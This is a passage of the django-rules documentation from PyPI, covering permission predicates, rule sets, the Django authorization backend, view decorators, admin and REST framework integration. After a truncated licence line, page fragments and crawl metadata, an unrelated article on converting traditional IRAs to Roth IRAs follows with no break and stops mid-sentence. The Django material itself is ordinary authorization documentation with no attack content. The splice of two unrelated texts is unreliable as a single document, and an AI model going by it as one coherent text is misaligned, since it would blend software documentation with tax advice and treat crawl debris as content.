<Predicate:is_book_author object at 0x10eeaa490> This predicate will return True if the book’s author is the given user, False otherwise. Predicates can be created from any callable that accepts anything from zero to two positional arguments: - fn(obj, target) - fn(obj) - fn() This is their generic form. If seen from the perspective of authorization in Django, the equivalent signatures are: - fn(user, obj) - fn(user) - fn() Predicates can do pretty much anything with the given arguments, but must always return True if the condition they check is true, False otherwise. rules comes with several predefined predicates that you may read about later on in API Reference, that are mostly useful when dealing with authorization in Django. Setting up rules Let’s pretend that we want to let authors edit or delete their books, but not books written by other authors. So, essentially, what determines whether an author can edit or can delete a given book is whether they are its author. In rules, such requirements are modelled as rules. A rule is a map of a unique identifier (eg. “can edit”) to a predicate. Rules are grouped together into a rule set. rules has two predefined rule sets: - A default rule set storing shared rules. - Another rule set storing rules that serve as permissions in a Django context. So, let’s define our first couple of rules, adding them to the shared rule set. We can use the is_book_author predicate we defined earlier: >>> rules.add_rule('can_edit_book', is_book_author) >>> rules.add_rule('can_delete_book', is_book_author) Assuming we’ve got some data, we can now test our rules: >>> from django.contrib.auth.models import User >>> from books.models import Book >>> guidetodjango = Book.objects.get(isbn='978-1-4302-1936-1') >>> guidetodjango.author <User: adrian> >>> adrian = User.objects.get(username='adrian') >>> rules.test_rule('can_edit_book', adrian, guidetodjango) True >>> rules.test_rule('can_delete_book', adrian, guidetodjango) True Nice… but not awesome. Combining predicates Predicates by themselves are not so useful – not more useful than any other function would be. Predicates, however, can be combined using binary operators to create more complex ones. Predicates support the following operators: - P1 & P2: Returns a new predicate that returns True if both predicates return True, otherwise False. If P1 returns False, P2 will not be evaluated. - P1 | P2: Returns a new predicate that returns True if any of the predicates returns True, otherwise False. If P1 returns True, P2 will not be evaluated. - P1 ^ P2: Returns a new predicate that returns True if one of the predicates returns True and the other returns False, otherwise False. - ~P: Returns a new predicate that returns the negated result of the original predicate. Suppose the requirement for allowing a user to edit a given book was for them to be either the book’s author, or a member of the “editors” group. Allowing users to delete a book should still be determined by whether the user is the book’s author. With rules that’s easy to implement. We’d have to define another predicate, that would return True if the given user is a member of the “editors” group, False otherwise. The built-in is_group_member factory will come in handy: >>> is_editor = rules.is_group_member('editors') >>> is_editor <Predicate:is_group_member:editors object at 0x10eee1350> We could combine it with the is_book_author predicate to create a new one that checks for either condition: >>> is_book_author_or_editor = is_book_author | is_editor >>> is_book_author_or_editor <Predicate:(is_book_author | is_group_member:editors) object at 0x10eee1390> We can now update our can_edit_book rule: >>> rules.set_rule('can_edit_book', is_book_author_or_editor) >>> rules.test_rule('can_edit_book', adrian, guidetodjango) True >>> rules.test_rule('can_delete_book', adrian, guidetodjango) True Let’s see what happens with another user: >>> martin = User.objects.get(username='martin') >>> list(martin.groups.values_list('name', flat=True)) ['editors'] >>> rules.test_rule('can_edit_book', martin, guidetodjango) True >>> rules.test_rule('can_delete_book', martin, guidetodjango) False Awesome. So far, we’ve only used the underlying, generic framework for defining and testing rules. This layer is not at all specific to Django; it may be used in any context. There’s actually no import of anything Django-related in the whole app (except in the rules.templatetags module). rules however can integrate tightly with Django to provide authorization. Using Rules with Django rules is able to provide object-level permissions in Django. It comes with an authorization backend and a couple template tags for use in your templates. Permissions In rules, permissions are a specialised type of rules. You still define rules by creating and combining predicates. These rules however, must be added to a permissions-specific rule set that comes with rules so that they can be picked up by the rules authorization backend. Creating permissions The convention for naming permissions in Django is app_label.action_object, and we like to adhere to that. Let’s add rules for the books.change_book and books.delete_book permissions: >>> rules.add_perm('books.change_book', is_book_author | is_editor) >>> rules.add_perm('books.delete_book', is_book_author) See the difference in the API? add_perm adds to a permissions-specific rule set, whereas add_rule adds to a default shared rule set. It’s important to know however, that these two rule sets are separate, meaning that adding a rule in one does not make it available to the other. Checking for permission Let’s go ahead and check whether adrian has change permission to the guidetodjango book: >>> adrian.has_perm('books.change_book', guidetodjango) False When you call the User.has_perm method, Django asks each backend in settings.AUTHENTICATION_BACKENDS whether a user has the given permission for the object. When queried for object permissions, Django’s default authentication backend always returns False. rules comes with an authorization backend, that is able to provide object-level permissions by looking into the permissions-specific rule set. Let’s add the rules authorization backend in settings: AUTHENTICATION_BACKENDS = ( 'rules.permissions.ObjectPermissionBackend', 'django.contrib.auth.backends.ModelBackend', ) Now, checking again gives adrian the required permissions: >>> adrian.has_perm('books.change_book', guidetodjango) True >>> adrian.has_perm('books.delete_book', guidetodjango) True >>> martin.has_perm('books.change_book', guidetodjango) True >>> martin.has_perm('books.delete_book', guidetodjango) False NOTE: Calling has_perm on a superuser will ALWAYS return True. Permissions in models NOTE: The features described in this section work on Python 3+ only. It is common to have a set of permissions for a model, like what Django offers with its default model permissions (such as add, change etc.). When using rules as the permission checking backend, you can declare object-level permissions for any model in a similar way, using a new Meta option. First, you need to switch your model’s base and metaclass to the slightly extended versions provided in rules.contrib.models. There are several classes and mixins you can use, depending on whether you’re already using a custom base and/or metaclass for your models or not. The extensions are very slim and don’t affect the models’ behavior in any way other than making it register permissions. If you’re using the stock django.db.models.Model as base for your models, simply switch over to RulesModel and you’re good to go. If you already have a custom base class adding common functionality to your models, add RulesModelMixin to the classes it inherits from and set RulesModelBase as its metaclass, like so: from django.db.models import Model from rules.contrib.models import RulesModelBase, RulesModelMixin class MyModel(RulesModelMixin, Model, metaclass=RulesModelBase): ... If you’re using a custom metaclass for your models, you’ll already know how to make it inherit from RulesModelBaseMixin yourself. Then, create your models like so, assuming you’re using RulesModel as base directly: import rules from rules.contrib.models import RulesModel class Book(RulesModel): class Meta: rules_permissions = { "add": rules.is_staff, "read": rules.is_authenticated, } This would be equivalent to the following calls: rules.add_perm("app_label.add_book", rules.is_staff) rules.add_perm("app_label.read_book", rules.is_authenticated) There are methods in RulesModelMixin that you can overwrite in order to customize how a model’s permissions are registered. See the documented source code for details if you need this. Of special interest is the get_perm classmethod of RulesModelMixin, which can be used to convert a permission type to the corresponding full permission name. If you need to query for some type of permission on a given model programmatically, this is handy: if user.has_perm(Book.get_perm("read")): ... Permissions in views rules comes with a set of view decorators to help you enforce authorization in your views. Using the function-based view decorator For function-based views you can use the permission_required decorator: from django.shortcuts import get_object_or_404 from rules.contrib.views import permission_required from posts.models import Post def get_post_by_pk(request, post_id): return get_object_or_404(Post, pk=post_id) @permission_required('posts.change_post', fn=get_post_by_pk) def post_update(request, post_id): # ... Usage is straight-forward, but there’s one thing in the example above that stands out and this is the get_post_by_pk function. This function, given the current request and all arguments passed to the view, is responsible for fetching and returning the object to check permissions against – i.e. the Post instance with PK equal to the given post_id in the example. This specific use-case is quite common so, to save you some typing, rules comes with a generic helper function that you can use to do this declaratively. The example below is equivalent to the one above: from rules.contrib.views import permission_required, objectgetter from posts.models import Post @permission_required('posts.change_post', fn=objectgetter(Post, 'post_id')) def post_update(request, post_id): # ... For more information on the decorator and helper function, refer to the rules.contrib.views module. Using the class-based view mixin Django includes a set of access mixins that you can use in your class-based views to enforce authorization. rules extends this framework to provide object-level permissions via a mixin, PermissionRequiredMixin. The following example will automatically test for permission against the instance returned by the view’s get_object method: from django.views.generic.edit import UpdateView from rules.contrib.views import PermissionRequiredMixin from posts.models import Post class PostUpdate(PermissionRequiredMixin, UpdateView): model = Post permission_required = 'posts.change_post' You can customise the object either by overriding get_object or get_permission_object. For more information refer to the Django documentation and the rules.contrib.views module. Checking permission automatically based on view type If you use the mechanisms provided by rules.contrib.models to register permissions for your models as described in Permissions in models, there’s another convenient mixin for class-based views available for you. rules.contrib.views.AutoPermissionRequiredMixin can recognize the type of view it’s used with and check for the corresponding permission automatically. This example view would, without any further configuration, automatically check for the "posts.change_post" permission, given that the app label is "posts": from django.views.generic import UpdateView from rules.contrib.views import AutoPermissionRequiredMixin from posts.models import Post class UpdatePostView(AutoPermissionRequiredMixin, UpdateView): model = Post By default, the generic CRUD views from django.views.generic are mapped to the native Django permission types (add, change, delete and view). However, the pre-defined mappings can be extended, changed or replaced altogether when subclassing AutoPermissionRequiredMixin. See the fully documented source code for details on how to do that properly. Permissions and rules in templates rules comes with two template tags to allow you to test for rules and permissions in templates. Add rules to your INSTALLED_APPS: INSTALLED_APPS = ( # ... 'rules', ) Then, in your template: {% load rules %} {% has_perm 'books.change_book' author book as can_edit_book %} {% if can_edit_book %} ... {% endif %} {% test_rule 'has_super_feature' user as has_super_feature %} {% if has_super_feature %} ... {% endif %} Permissions in the Admin If you’ve setup rules to be used with permissions in Django, you’re almost set to also use rules to authorize any add/change/delete actions in the Admin. The Admin asks for four different permissions, depending on action: - <app_label>.add_<modelname> - <app_label>.view_<modelname> - <app_label>.change_<modelname> - <app_label>.delete_<modelname> - <app_label> Note: view permission is new in Django v2.1 and should not be added in versions before that. The first four are obvious. The fifth is the required permission for an app to be displayed in the Admin’s “dashboard”. Overriding it does not restrict access to the add, change or delete views. Here’s some rules for our imaginary books app as an example: >>> rules.add_perm('books', rules.always_allow) >>> rules.add_perm('books.add_book', is_staff) >>> rules.add_perm('books.view_book', is_staff | has_secret_access_code) >>> rules.add_perm('books.change_book', is_staff) >>> rules.add_perm('books.delete_book', is_staff) Django Admin does not support object-permissions, in the sense that it will never ask for permission to perform an action on an object, only whether a user is allowed to act on (any) instances of a model. If you’d like to tell Django whether a user has permissions on a specific object, you’d have to override the following methods of a model’s ModelAdmin: - has_view_permission(user, obj=None) - has_change_permission(user, obj=None) - has_delete_permission(user, obj=None) rules comes with a custom ModelAdmin subclass, rules.contrib.admin.ObjectPermissionsModelAdmin, that overrides these methods to pass on the edited model instance to the authorization backends, thus enabling permissions per object in the Admin: # books/admin.py from django.contrib import admin from rules.contrib.admin import ObjectPermissionsModelAdmin from .models import Book class BookAdmin(ObjectPermissionsModelAdmin): pass admin.site.register(Book, BookAdmin) Now this allows you to specify permissions like this: >>> rules.add_perm('books', rules.always_allow) >>> rules.add_perm('books.add_book', has_author_profile) >>> rules.add_perm('books.change_book', is_book_author_or_editor) >>> rules.add_perm('books.delete_book', is_book_author) To preserve backwards compatibility, Django will ask for either view or change permission. For maximum flexibility, rules behaves subtly different: rules will ask for the change permission if and only if no rule exists for the view permission. Permissions in Django Rest Framework Similar to rules.contrib.views.AutoPermissionRequiredMixin, there is a rules.contrib.rest_framework.AutoPermissionViewSetMixin for viewsets in Django Rest Framework. The difference is that it doesn’t derive permission from the type of view but from the API action (create, retrieve etc.) that’s tried to be performed. Of course, it also requires you to declare your models as described in Permissions in models. Here is a possible ModelViewSet for the Post model with fully automated CRUD permission checking: from rest_framework.serializers import ModelSerializer from rest_framework.viewsets import ModelViewSet from rules.contrib.rest_framework import AutoPermissionViewSetMixin from posts.models import Post class PostSerializer(ModelSerializer): class Meta: model = Post fields = "__all__" class PostViewSet(AutoPermissionViewSetMixin, ModelViewSet): queryset = Post.objects.all() serializer_class = PostSerializer By default, the CRUD actions of ModelViewSet are mapped to the native Django permission types (add, change, delete and view). The list action has no permission checking enabled. However, the pre-defined mappings can be extended, changed or replaced altogether when using (or subclassing) AutoPermissionViewSetMixin. Custom API actions defined via the @action decorator may then be mapped as well. See the fully documented source code for details on how to properly customize the default behavior. Advanced features Custom rule sets You may create as many rule sets as you need: >>> features = rules.RuleSet() And manipulate them by adding, removing, querying and testing rules: >>> features.rule_exists('has_super_feature') False >>> is_special_user = rules.is_group_member('special') >>> features.add_rule('has_super_feature', is_special_user) >>> 'has_super_feature' in features True >>> features['has_super_feature'] <Predicate:is_group_member:special object at 0x10eeaa500> >>> features.test_rule('has_super_feature', adrian) True >>> features.remove_rule('has_super_feature') Note however that custom rule sets are not available in Django templates – you need to provide integration yourself. Invocation context A new context is created as a result of invoking Predicate.test() and is only valid for the duration of the invocation. A context is a simple dict that you can use to store arbitrary data, (eg. caching computed values, setting flags, etc.), that can be used by predicates later on in the chain. Inside a predicate function it can be used like so: >>> @predicate ... def mypred(a, b): ... value = compute_expensive_value(a) ... mypred.context['value'] = value ... return True Other predicates can later use stored values: >>> @predicate ... def myotherpred(a, b): ... value = myotherpred.context.get('value') ... if value is not None: ... return do_something_with_value(value) ... else: ... return do_something_without_value() Predicate.context provides a single args attribute that contains the arguments as given to test() at the beginning of the invocation. Binding “self” In a predicate’s function body, you can refer to the predicate instance itself by its name, eg. is_book_author. Passing bind=True as a keyword argument to the predicate decorator will let you refer to the predicate with self, which is more convenient. Binding self is just syntactic sugar. As a matter of fact, the following two are equivalent: >>> @predicate ... def is_book_author(user, book): ... if is_book_author.context.args: ... return user == book.author ... return False >>> @predicate(bind=True) ... def is_book_author(self, user, book): ... if self.context.args: ... return user == book.author ... return False Skipping predicates You may skip evaluation by returning None from your predicate: >>> @predicate(bind=True) ... def is_book_author(self, user, book): ... if len(self.context.args) > 1: ... return user == book.author ... else: ... return None Returning None signifies that the predicate need not be evaluated, thus leaving the predicate result up to that point unchanged. Logging predicate evaluation rules can optionally be configured to log debug information as rules are evaluated to help with debugging your predicates. Messages are sent at the DEBUG level to the 'rules' logger. The following dictConfig configures a console logger (place this in your project’s settings.py if you’re using rules with Django): LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'handlers': { 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', }, }, 'loggers': { 'rules': { 'handlers': ['console'], 'level': 'DEBUG', 'propagate': True, }, }, } When this logger is active each individual predicate will have a log message printed when it is evaluated. Best practices Before you can test for rules, these rules must be registered with a rule set, and for this to happen the modules containing your rule definitions must be imported. For complex projects with several predicates and rules, it may not be practical to define all your predicates and rules inside one module. It might be best to split them among any sub-components of your project. In a Django context, these sub-components could be the apps for your project. On the other hand, because importing predicates from all over the place in order to define rules can lead to circular imports and broken hearts, it’s best to further split predicates and rules in different modules. rules may optionally be configured to autodiscover rules.py modules in your apps and import them at startup. To have rules do so, just edit your INSTALLED_APPS setting: INSTALLED_APPS = ( # replace 'rules' with: 'rules.apps.AutodiscoverRulesConfig', ) Note: On Python 2, you must also add the following to the top of your rules.py file, or you’ll get import errors trying to import rules itself: from __future__ import absolute_import API Reference The core APIs are accessible from the root rules module. Django-specific functionality for the Admin and views is available from rules.contrib. Class rules.Predicate You create Predicate instances by passing in a callable: >>> def is_book_author(user, book): ... return book.author == user ... >>> pred = Predicate(is_book_author) >>> pred <Predicate:is_book_author object at 0x10eeaa490> You may optionally provide a different name for the predicate that is used when inspecting it: >>> pred = Predicate(is_book_author, name='another_name') >>> pred <Predicate:another_name object at 0x10eeaa490> Also, you may optionally provide bind=True in order to be able to access the predicate instance with self: >>> def is_book_author(self, user, book): ... if self.context.args: ... return user == book.author ... return False ... >>> pred = Predicate(is_book_author, bind=True) >>> pred <Predicate:is_book_author object at 0x10eeaa490> Instance methods - test(obj=None, target=None) - Returns the result of calling the passed in callable with zero, one or two positional arguments, depending on how many it accepts. Class rules.RuleSet RuleSet extends Python’s built-in dict type. Therefore, you may create and use a rule set any way you’d use a dict. Instance methods - add_rule(name, predicate) - Adds a predicate to the rule set, assigning it to the given rule name. Raises KeyError if another rule with that name already exists. - set_rule(name, predicate) - Set the rule with the given name, regardless if one already exists. - remove_rule(name) - Remove the rule with the given name. Raises KeyError if a rule with that name does not exist. - rule_exists(name) - Returns True if a rule with the given name exists, False otherwise. - test_rule(name, obj=None, target=None) - Returns the result of calling predicate.test(obj, target) where predicate is the predicate for the rule with the given name. Returns False if a rule with the given name does not exist. Decorators - @predicate Decorator that creates a predicate out of any callable: >>> @predicate ... def is_book_author(user, book): ... return book.author == user ... >>> is_book_author <Predicate:is_book_author object at 0x10eeaa490> Customising the predicate name: >>> @predicate(name='another_name') ... def is_book_author(user, book): ... return book.author == user ... >>> is_book_author <Predicate:another_name object at 0x10eeaa490> Binding self: >>> @predicate(bind=True) ... def is_book_author(self, user, book): ... if 'user_has_special_flag' in self.context: ... return self.context['user_has_special_flag'] ... return book.author == user Predefined predicates - always_allow(), always_true() - Always returns True. - always_deny(), always_false() - Always returns False. - is_authenticated(user) - Returns the result of calling user.is_authenticated(). Returns False if the given user does not have an is_authenticated method. - is_superuser(user) - Returns the result of calling user.is_superuser. Returns False if the given user does not have an is_superuser property. - is_staff(user) - Returns the result of calling user.is_staff. Returns False if the given user does not have an is_staff property. - is_active(user) - Returns the result of calling user.is_active. Returns False if the given user does not have an is_active property. - is_group_member(*groups) - Factory that creates a new predicate that returns True if the given user is a member of all the given groups, False otherwise. Shortcuts Managing the permissions rule set - add_perm(name, predicate) - Adds a rule to the permissions rule set. See RuleSet.add_rule. - set_perm(name, predicate) - Replace a rule from the permissions rule set. See RuleSet.set_rule. - remove_perm(name) - Remove a rule from the permissions rule set. See RuleSet.remove_rule. - perm_exists(name) - Returns whether a rule exists in the permissions rule set. See RuleSet.rule_exists. - has_perm(name, user=None, obj=None) - Tests the rule with the given name. See RuleSet.test_rule. Licence django-rules is distributed under the | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/rules/
CC-MAIN-2022-21
refinedweb
4,283
50.33
Scala's List has a Secret OOP couples the “data” with the methods operating on it, and that’s considered bad in FP circles, because supposedly data outlives the functions operating on it. Also in static FP circles, dumb data structures are reusable, so it’s a good idea to make them generic, and add restrictions on the functions themselves. Few data structures could be simpler than an immutable List definition, right? At least as far as recursive data structures go 🙂 For the standard List you’d expect the following: sealed abstract class List[+A] final case class :: [+A](head: A, tail: List[A]) extends List[A] case object Nil extends List[Nothing] Oh boy, I’ve got news for you — this is the actual definition from Scala’s standard library: sealed abstract class List[+A] final case class :: [+A]( head: A, // mutable var 😱 private[scala] var next: List[A @uncheckedVariance]) extends List[A] { // 😱 memory barrier releaseFence() } case object Nil extends List[Nothing] Yikes, that private next value is a var. They added it as a var such that ListBuffer can build a list more efficiently, because an immutable List is in essence a Stack, so to build a new list from an existing one, you’d need to do an O(n) reversal at the end. With the pure definition, we’d build List values like this: def map[A, B](self: List[A])(f: A => B): List[B] = { var buffer = List.empty[B] for (elem <- self) { buffer = f(elem) :: buffer } // Extra O(n) tax if that list would be pure, no way around it // (legend has it that this is a computer science issue related to stacks) buffer.reverse } But with ListBuffer, due to making use of that var: def map[A, B](self: List[A])(f: A => B): List[B] = { val buffer = ListBuffer.empty[B] for (elem <- self) { buffer += f(elem) } // O(1), no inefficiency buffer.toList } Contrary to popular opinion, this means List does not benefit from final ( val in Scala) visibility guarantees by the Java Memory Model. So it might have visibility issues in a multi-threaded context (e.g. you might end up with a tail being null when it shouldn’t be). Which is probably why we see this in both the class constructor and in ListBuffer#toList: override def toList: List[A] = { aliased = nonEmpty // We've accumulated a number of mutations to `List.tail` by this stage. // Make sure they are visible to threads that the client of this ListBuffer might be about // to share this List with. releaseFence() first } Yikes, they are adding manual memory barriers everywhere 😲 I guess it beats an added O(n) penalty when building new lists. But this goes to show the necessity of coupling data structures with the methods operating on them. FP developers don’t care about resources, because of the expectation that resources should be handled by the runtime, but sometimes that isn’t possible or optimal — even dumb data structures are resources and sometimes need special resource management, for efficiency reasons. In which case coupling the data with the methods operating on it is healthy 😉 I don't like manual memory barriers BTW. They are expensive and a design based on proper acquisition and release (reads and writes in volatiles) would be better, as it lets the JVM do its magic. Don't copy their design here without knowing what you're doing.
https://alexn.org/blog/2021/02/12/scala-list-secret/
CC-MAIN-2022-21
refinedweb
570
54.86
Revision history for Perl extension autobox 2.83 Sun Feb 1 21:34:01 2015 - RT #100247: fix assertion failures on 5.21.x perls with -DDEBUGGING (thanks, ilmari and Father Chrysostomos) - RT #100717: don't hide autobox::universal from PAUSE (thanks, ppisar) - RT #89754: INSTALLDIRS fix (thanks, Kent Fredric) 2.82 Sat Oct 26 12:44:52 2013 - simplify test to avoid portability woes 2.81 Sat Oct 26 11:32:31 2013 - fix failing test on Windows 2.80 Fri Oct 25 19:32:12 2013 - RT #71777: fix segfault in destructor called during global destruction (thanks, Tomas Doran) - added t/rt_71777.t - fix doc typo (thanks, David Steinbrunner) 2.79 Tue Apr 30 21:22:05 2013 - allow import arguments to be passed as a hashref - added t/import_hashref.t - doc tweaks 2.78 Tue Apr 30 18:53:54 2013 - RT #80400: fix segfault in destructor called in END block (thanks, Tokuhiro Matsuno) - added t/rt_80400.t 2.77 Thu Dec 13 19:59:48 2012 - doc tweaks - add multiple-arg autoref tests 2.76 Wed Nov 21 14:35:33 2012 - fix breaking tests in perl >= 5.17.5: update error message pattern (thanks, rjbs) - update ppport.h from 3.19 to 3.20 2.75 Thu Jul 21 22:07:26 2011 - POD spelling fixes (thanks, Jonathan Yu and gregor herrmann) 2.74 Wed Jul 20 14:25:52 2011 - portability fix for perl >= 5.14 (thanks, chorny) 2.73 Sun Mar 13 16:35:28 2011 - Makefile.PL fix 2.72 Fri Jan 28 12:16:34 2011 - fix conflict with use re 'taint' (thanks, Peter Rabbitson) 2.71 Thu Sep 23 02:28:10 2010 - fix for recent perls: remove cargo-cult 2.55 Sun May 25 03:20:54 2008 - fix MANIFEST again - restore Changes 2.54 Sun May 25 00:36:04 2008 - fix MANIFEST 2.53 Sat May 24 22:19:45 2008 - add support for UNIVERSAL virtual type - added t/universal.t - moved autobox::type method to autobox::universal::type subroutine - added export.t - added t/default.t - portability fix for non-gcc compilers (thanks chris) - misc code/documentation fixes/cleanups 2.52 Tue May 20 12:24:01 2008 - more type fixes 2.51 Tue May 20 10:40:32 2008 - fix type identification for former INTEGERs and FLOATs (thanks Mitchell N Charity) - added type.t - fix for perl 5.11 (thanks Andreas Koenig) - document eval EXPR gotcha 2.50 Mon May 19 17:39:22 2008 - add support for INTEGER, FLOAT, NUMBER and STRING - added scalar.t - updated documentation 2.43 Thu May 15 21:14:08 2008 - fix @isa bug - added t/isa.t - scope cleanup - documentation tweak 2.42 Tue May 13 22:22:55 2008 - upgrade ppport.h to 3.13_03 to s/workaround/fix/ 2.41 Tue May 13 20:02:37 2008 - work around $value->$method segfault with non-string method names under perls <= 5.8.8 - added license info 2.40 Mon May 12 23:51:26 2008 - support @array and %hash (thanks Yuval Kogman (nothingmuch) and Matthijs van Duin (xmath)) - added t/autoref.t - fix $value->$method segfault with undef, integer, float &c. (i.e. non-string) method names (thanks John Goulah) 2.30 Fri May 9 01:52:19 2008 - support $value->$method, where $method is a method name or subroutine reference: - added t/name.t - added t/coderef.t 2.23 Sun Feb 24 15:17:05 2008 - rm redundant $^H hacking 2.22 Sun Feb 24 14:44:58 2008 - added hints.t 2.21 Fri Feb 22 21:40:54 2008 - merge unimport.t and time_travel.t into unmerge.t - more tests 2.20 Thu Feb 21 23:30:53 2008 - Fix broken merging - corrected merge.t - added time_travel.t to verify correctness 2.11 Wed Feb 20 21:06:25 2008 - Windows portability fix: ANSIfy C99-ism (thanks Taro Nishino) - revert broken micro-optimization 2.10 Wed Feb 20 02:16:42 2008 - fix + tests: unimport default namespace(s) in an array ref 2.02 Sun Feb 17 16:59:28 2008 - doc tweak - POD formatting 2.01 Sun Feb 17 03:56:22 2008 - documentation fix: rm reference to $class->SUPER::import(TYPE => __PACKAGE__) and explain why an auxiliary class should be used 2.00 Sun Feb 17 02:29:11 2008 - API changes: autobox with one or more args leaves the unspecified types unboxed multiple autobox (or autobox subclass) invocations in the same lexical scope are merged (thanks Matsuno Tokuhiro) multiple bindings for each type can be supplied as an ARRAY ref of classes or namespaces "no autobox qw(...)" disables/resets bindings for the specified type(s) - fixed incorrect bareword handling - perl 5.10 compatibility fixes (thanks Andreas Koenig) - document previously undocumented features - document subclassing - merge.t: test merging - beef up the default DEBUG handler so that it shows the superclasses of the synthetic classes - Windows compatibilty fix (thanks Alexandr Ciornii) - misc optimizations, cleanups 1.22 Sun Sep 23 22:27:44 2007 - (Perl_ck_subr and Perl_ck_null): fix build failure on Windows 1.21 Sun Sep 23 20:35:37 2007 - (Makefile): fix build failure on Windows (thanks Alexandr Ciornii) 1.20 Sun Sep 23 14:05:39 2007 - (ptable.h): fix build failures on perl >= 5.9.3 (thanks Andreas Koenig) - (Perl_pp_method_named): fix build failure on Windows (thanks randyk and Alexandr Ciornii) 1.10 Thu Nov 23 20:32:53 2006 - moved END handler into XS - updated SEE ALSO section - s/REPORT/DEBUG/ - fix and test for UNDEF => '' - portability fixlet for Windows 1.04 Mon Nov 20 00:25:50 2006 - fix threaded perl pessimization - applied patch: (thanks Steve Peters) - documentation fixlet - portability fixlet 1.03 Sat Apr 23 20:35:16 2005 - workaround and test for %^H bug - require perl >= 5.8 1.02 Tue Apr 12 20:52:02 2005 - re-fixed Makefile.PL/META.yml + copyright 1.01 Tue Apr 12 19:58:49 2005 - compatibility/portability fixes + isolate ptr table from perl's implementation 1.00 Tue Apr 12 01:16:52 2005 - rewrite: no longer requires a patch 0.11 Tue Feb 3 13:21:47 2004 - Added patch for perl-5.8.3 0.10 Fri Dec 12 15:24:16 2003 - fixed obsolete reference to perl-5.8.1 in POD 0.09 Fri Dec 12 11:53:02 2003 - Added patch for perl-5.8.2 0.08 Fri Oct 17 11:50:34 2003 - removed obsolete references to perl-5.8.1-RC4 from README 0.07 Tue Oct 14 13:34:16 2003 - updated patch to work against perl-5.8.1. This patch should be applied to a clean perl-5.8.1 tree. Previous versions of perl are no longer supported - minor documentation tweaklets - added typemap() static method to autobox.pm to facilitate subclassing 0.06 Mon Aug 18 17:40:53 2003 - This version provides an updated patch. It should be applied to a clean perl-5.8.1-RC4 tree - Thanks to Tassilo von Parseval for hunting down and fixing a memory leak - Added support for builtin pseudotype, UNDEF - Added tests and documentation for old VERSION() and new UNDEF features 0.05 Mon Aug 11 03:13:04 2003 - autobox.pm update: no change to the patch - Cleaned up implementation of isa() and can() - Added support for VERSION() (untested) 0.04 Sun Aug 10 14:57:18 2003 - This version provides a new patch which ensures that undef values aren't autoboxed. It should be applied to a clean perl-5.8.1-RC4 tree - fixed (i.e. prevented) autoboxing of undef in isa() and can() - fixed Makefile.PL and META.yml to ensure that new installs of autobox.pm aren't shadowed by old versions (thanks Michael G Schwern) 0.03 Sun Aug 10 03:17:16 2003 - added support for can() and isa() - documented print { hashref_expression() } issues/workarounds 0.02 Wed Aug 6 16:49:45 2003 - the patch is now a single file - instructions for applying the patch added to README - documentation fixlets for the patch and module 0.01 Mon Aug 4 01:00:18 2003 - original version; created by h2xs 1.21 with options -n autobox-0.01
https://metacpan.org/changes/distribution/autobox
CC-MAIN-2016-30
refinedweb
1,375
68.87
Revisiting Roth Conversions Now may be the time to go all in. Now may be the time to go all in. Roth IRA conversions might seem like old news, but today’s tax and economic environment warrants a fresh look at the benefits of converting a traditional individual retirement account to a Roth. As always, a client’s changing needs may alter the analysis and make conversion suitable where it wasn’t before. What’s new is the likelihood of rising tax rates down the road and a rocky stock market. This combination makes conversions particularly attractive for many retirement savers today. First, a review to illustrate the advantages of a conversion: Traditional IRAs, as well as employer-sponsored SIMPLE IRAs and SEP-IRAs, are funded by pretax dollars. Because the funds generated a tax deduction upon original contribution, they are taxed upon withdrawal. Additionally, although capital gains and income are tax-deferred inside an IRA, withdrawals are taxable in full at ordinary income tax rates. Roth IRAs are almost the inverse of IRAs. There is no tax deduction when contributions are made to the account. However, withdrawals are completely tax-free (assuming the account has been in existence at least five years). In other words, a Roth owner never pays tax on the account’s earnings. There is one other major difference between Roth IRAs and IRAs: IRA owners must take required minimum distributions, or RMDs, once they reach age 701/2, even if they don’t need the cash flow. That results in regular taxable income recognition. Because RMDs are not required for Roth IRAs, these accounts can earn tax-free returns over a longer period of time. Conversion Considerations Subject to income limitations, the maximum allowable contribution is $6,000 per year for those under age 50 and $7,000 for those 50 and older. But as of 2010, taxpayers can convert an unlimited amount of an IRA balance to a Roth. That comes with the cost of recognizing taxable income in the amount of the conversion— but it also means the permanent avoidance of tax on future growth in the account. For those in middle and high tax brackets, the decision of whether and how much to convert to a Roth can require a complex cost/benefit analysis. Sometimes, however, the answer is easy. For any taxpayer with a year of negative taxable income, it makes sense to do a Roth conversion to the extent that no tax is generated. This may occur during a year when itemized or standard deductions exceed income, or when there are substantial business losses or net operating loss carryforwards. In my opinion, any financial advisor or CPA who fails to recommend a Roth conversion in a year of negative taxable income could be subject to a malpractice claim. For those in a low tax bracket, it might make sense to convert an amount that will take full advantage of the lower bracket. For example, a single taxpayer might want to convert an amount that will bring taxable income to $39,475, the top of the 12% bracket in 2019. Or a client with negative taxable income of $11,000 might choose to convert $50,000 of IRA savings to a Roth IRA, resulting in taxable income of $39,000 and a federal tax of only $4,680. This is a very reasonable price tag to be able to fully avoid tax on principal and earnings forever. A recent wrinkle: To qualify as a Roth conversion, the transfer must occur by the end of the year—and as a result of the Tax Cuts and Jobs Act of 2017, recharacterizations after year-end are no longer allowed. Before the act, taxpayers could “unconvert” part or all of the transfer by recharacterizing it before the due date of the tax return (including extensions). So, in the above example, if the client converted $50,000 and, upon preparing the tax return, discovered that taxable income was $10,000 higher than expected, $10,000 of the converted amount could be recharacterized after year-end. Given that this type of maneuver is no longer possible, it might be best to be conservative when estimating taxable income to ensure that the conversion does not trigger a higher tax than planned. Since all clients have different situations and different preferences, there are no definitive lines indicating yes or no on a decision to do a Roth conversion. However, there are some general guidelines, as shown in the exhibit. The factors in the con column can be stop signs. If there are no outside funds to pay taxes, then converting an IRA to a Roth means withdrawing money to cover the tax payments as well—resulting in additional tax cost. For example, a client in the 40% tax bracket who wants to convert $100,000 from a $200,000 IRA would need to withdraw $166,667 to cover the taxes. And note that withdrawals used to pay tax can be subject to early distribution penalties if the taxpayer is under age 591/2. If marginal rates are likely to decrease in the future, it might be beneficial to delay Roth conversion. And, if the funds must be depleted over time for cash flow purposes during the retirement years, the immediate tax on the Roth conversion may not be offset by avoiding tax on future growth. Similarly, if the IRA is to be left to a charity that won’t owe taxes on the funds, taxes on a conversion won’t be offset by a tax savings later. Good Timing For many clients, however, the time is now right to evaluate, or reevaluate, a Roth conversion. First, the Tax Cuts and Jobs Act produced some of the lowest tax rates in recent history— and they are unlikely to stick. Most Americans expect income tax rates to increase in the future. This seems like a safe prediction considering the growing size of the deficit combined with today’s 